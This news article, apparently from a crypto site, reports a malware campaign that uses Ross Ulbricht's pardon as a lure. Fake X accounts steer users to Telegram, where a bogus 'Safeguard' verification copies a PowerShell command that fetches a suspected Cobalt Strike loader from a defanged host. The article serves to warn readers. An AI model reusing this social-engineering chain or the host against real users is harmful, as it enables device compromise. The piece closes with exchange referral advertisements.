Ross Ulbricht, the controversial creator of the Silk Road, has long been at the center of debates over the intersection of technology and criminal activity. Following US President Donald Trump’s full pardon, a new wave of cybercrime has emerged that takes advantage of news of the Ulbricht case to distribute malware to unsuspecting targets.
Taking advantage of the news surrounding it, threat actors on X are redirecting users to a Telegram channel where they trick them into running PowerShell scripts that infect their devices with malware.
Ross Ulbricht malware campaign
According to the latest report from vx-underground researchers updateThe attack uses a new variation of the popular “Click-Fix” tactic, but with a twist. Instead of disguising itself as a common bug fix, this version is intended to be a captcha or verification process required to join the channel.
In this case, cybercriminals are impersonating Ulbricht using fake but verified accounts on X to lure users to Telegram channels that are falsely considered official. Once on Telegram, users encounter a fraudulent “Safeguard” identity verification process, which takes them to a mini-app that generates a fake verification dialog and automatically copies a PowerShell command to their clipboard.
Users are then prompted to run the command through the Windows Run dialog box. As such, the execution of the command triggers a chain of events. Initially, you download a PowerShell script, which retrieves a ZIP file from http://openline[.]ctu. The ZIP file contains several files, including Identity-helper.exe, which is suspected to be a Cobalt Strike loader, a tool frequently used by attackers for remote access and launching ransomware or data theft campaigns.
The entire process is carefully worded to avoid detection.
Ross Ulbricht released
This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 for founding and operating the infamous dark web marketplace Silk Road.
Silk Road was an online marketplace on the Tor network that allowed people to trade illegal items, such as narcotics. Ulbricht operated the site using the pseudonym “Dread Pirate Roberts.” The FBI arrested him in October 2013 and took the site offline.
In 2015, Ulbricht was found guilty of charges including drug distribution and money laundering. He received a life sentence without parole and his appeals in 2017 and 2018 were denied.
Binance Free $600 (CryptoPotato Exclusive) – Use this link to register a new account and receive an exclusive welcome offer of $600 on Binance (full details).
LIMITED OFFER for CryptoPotato readers on Bybit: Use this link to register and open a FREE $500 position in any coin!
